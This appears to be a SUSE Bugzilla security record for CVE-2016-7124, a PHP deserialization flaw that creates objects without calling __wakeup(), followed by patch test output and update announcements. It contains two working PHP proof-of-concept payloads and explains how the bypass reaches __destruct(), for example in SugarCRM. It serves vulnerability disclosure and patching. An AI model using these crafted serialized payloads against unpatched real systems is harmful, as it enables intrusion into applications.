Bugzilla – Bug 997206
VUL-0: CVE-2016-7124: php5: Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
Last modified: 2019-06-16 14:38:30 UTC
Description: ------------ Create an Unexpected Object and Don't Invoke __wakeup() in During Deserialization ``` static inline long object_common1(UNSERIALIZE_PARAMETER, zend_class_entry *ce) { ... if (ce->serialize == NULL) { object_init_ex(*rval, ce); <=== create object ... static inline int object_common2(UNSERIALIZE_PARAMETER, long elements) { ... if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_PP(rval), elements, 1)) { <=== create object properties return 0; } if (Z_OBJCE_PP(rval) != PHP_IC_ENTRY && zend_hash_exists(&Z_OBJCE_PP(rval)->function_table, "__wakeup", sizeof("__wakeup"))) { INIT_PZVAL(&fname); ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1, 0); BG(serialize_lock)++; call_user_function_ex(CG(function_table), rval, &fname, &retval_ptr, 0, 0, 1, NULL TSRMLS_CC); <=== call to __wakeup() BG(serialize_lock)--; } ``` If the process_nested_data() return 0, the __wakeup() will not be invoked, but the object and its properties has been created, then the unexpected object will be destroyed (or may not). This may cause some security issues. i)The unexpected object was destroyed, invoke __destruct() Some app revents objects deserialization via __wakeup(), ex SugarCRM: https://github.com/sugarcrm/sugarcrm_dev/blob/de002ede6b3f62ea9f0e22a49ba281c680bc69d7/Zend/Http/Response/Stream.php ``` public function __destruct() { if(is_resource($this->stream)) { fclose($this->stream); $this->stream = null; } if($this->_cleanup) { @unlink($this->stream_name); } } /** * This is needed to prevent unserialize vulnerability */ public function __wakeup() { // clean all properties foreach(get_object_vars($this) as $k => $v) { $this->$k = null; } throw new Exception("Not a serializable object"); } ``` So attacker can bypass __wakeup() and invoke __destruct() with crafted properties. ii)The unexpected object wasn't destroyed, invoke more magic methods. Keeping the unexpected object via customized deserialization. PoC: ``` <?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } $inner = 'a:1:{i:0;O:9:"Exception":2:{s:7:"'."\0".'*'."\0".'file";R:4;}'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:4;}'; $data = unserialize($exploit); echo $data[1]; ?> ``` Keeping the unexpected object via session deserialization. ``` PS_SERIALIZER_DECODE_FUNC(php_serialize) /* {{{ */ { ... PHP_VAR_UNSERIALIZE_INIT(var_hash); ALLOC_INIT_ZVAL(session_vars); if (php_var_unserialize(&session_vars, &val, endptr, &var_hash TSRMLS_CC)) { var_push_dtor(&var_hash, &session_vars); } PHP_VAR_UNSERIALIZE_DESTROY(var_hash); ... PS(http_session_vars) = session_vars; ``` The unexpected data in during deserialization will be still stored into $_SESSION. PoC: ``` <?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $sess = 'O:9:"Exception":2:{s:7:"'."\0".'*'."\0".'file";R:1;}'; session_decode($sess); echo $_SESSION; ?> ``` References: https://bugs.php.net/bug.php?id=72663 (patches and more PoCs)
bugbot adjusting priority
BEFORE I get the segfault for 12sp2/php7 13.2/php5 and 12/php5 with both testcase from comment 0. For 11sp3/php53 and 11/php5 the code looks like it requires the patch, considering affected. Note that the fix for 12sp2/php7 and php5 looks differently. For sle12 for example: $ php test1.php PHP Notice: unserialize(): Unexpected end of serialized data in /997206/test1.php on line 8 PHP Notice: unserialize(): Error at offset 46 of 47 bytes in /997206/test1.php on line 8 Segmentation fault (core dumped) $ php test2.php PHP Notice: session_decode(): Unexpected end of serialized data in /997206/test2.php on line 6 Segmentation fault (core dumped) $ AFTER For sle12 for example: $ php test1.php PHP Notice: unserialize(): Unexpected end of serialized data in /997206/test1.php on line 8 PHP Notice: unserialize(): Error at offset 46 of 47 bytes in /997206/test1.php on line 8 $ php test2.php PHP Notice: session_decode(): Unexpected end of serialized data in /997206/test2.php on line 6 PHP Notice: Array to string conversion in /997206/test2.php on line 7 $
Packages submitted.
This is an autogenerated message for OBS integration: This bug (997206) was mentioned in https://build.opensuse.org/request/show/425708 13.2 / php5
SUSE-SU-2016:2328-1: An update that fixes 18 vulnerabilities is now available. Category: security (important) Bug References: 987530,991426,991427,991428,991429,991430,991433,991437,997206,997207,997208,997210,997211,997220,997225,997230,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): php53-5.3.17-55.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): php53-5.3.17-55.1
openSUSE-SU-2016:2337-1: An update that fixes 10 vulnerabilities is now available. Category: security (important) Bug References: 997206,997207,997208,997210,997211,997220,997225,997230,997248,997257 CVE References: CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134 Sources used: openSUSE 13.2 (src): php5-5.6.1-75.2
SUSE-SU-2016:2408-1: An update that fixes 24 vulnerabilities is now available. Category: security (important) Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php5-5.5.14-73.1 SUSE Linux Enterprise Module for Web Scripting 12 (src): php5-5.5.14-73.1
openSUSE-SU-2016:2451-1: An update that fixes 24 vulnerabilities is now available. Category: security (important) Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257 CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134 Sources used: openSUSE Leap 42.1 (src): php5-5.5.14-59.1
SUSE-SU-2016:2459-1: An update that fixes 16 vulnerabilities is now available. Category: security (important) Bug References: 997206,997207,997208,997210,997211,997220,997225,997230,997257,999679,999680,999682,999684,999685,999819,999820 CVE References: CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7411,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418 Sources used: SUSE OpenStack Cloud 5 (src): php53-5.3.17-84.1 SUSE Manager Proxy 2.1 (src): php53-5.3.17-84.1 SUSE Manager 2.1 (src): php53-5.3.17-84.1 SUSE Linux Enterprise Software Development Kit 11-SP4 (src): php53-5.3.17-84.1 SUSE Linux Enterprise Server 11-SP4 (src): php53-5.3.17-84.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): php53-5.3.17-84.1 SUSE Linux Enterprise Point of Sale 11-SP3 (src): php53-5.3.17-84.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): php53-5.3.17-84.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): php53-5.3.17-84.1
SUSE-SU-2016:2460-1: An update that solves 29 vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820 CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php7-7.0.7-15.1 SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
released
SUSE-SU-2016:2460-2: An update that solves 29 vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820 CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418 Sources used: SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2017-02-13. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63367